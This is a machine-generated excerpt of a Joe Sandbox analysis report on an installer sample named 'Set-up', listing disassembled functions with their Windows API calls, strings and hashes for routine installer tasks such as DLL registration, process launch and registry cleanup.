Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: failed createprocess ("%s"), xrefs: 004022C2
Exec: command="%s", xrefs: 00402241
Exec: success ("%s"), xrefs: 00402263

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(0001AA00,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

%u.%u%s%s, xrefs: 00404444
@rD, xrefs: 00404402

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 62d1a696c90b95282af5dc14f7046faf50b68b39d5c561db380251ecdb666397
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegKey: "%s\%s", xrefs: 00402843
DeleteRegValue: "%s\%s" "%s", xrefs: 00402820

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 17145ca8eb8223996ba0bf6dcd82413fea569a735e29ac8632e0b2d115fecab3
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000000.00000002.1685476250.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1685460044.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685503532.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.000000000048B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000493000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.0000000000497000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685528959.00000000004BF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1685732019.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_'Set-up.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
Opcode Fuzzy Hash: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction Fuzzy Hash: 7A114FB1500218ABEF21AF61ED41E9B3769AB84359F00803BF714751A2C77C8D519BAD

Function 00402665 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
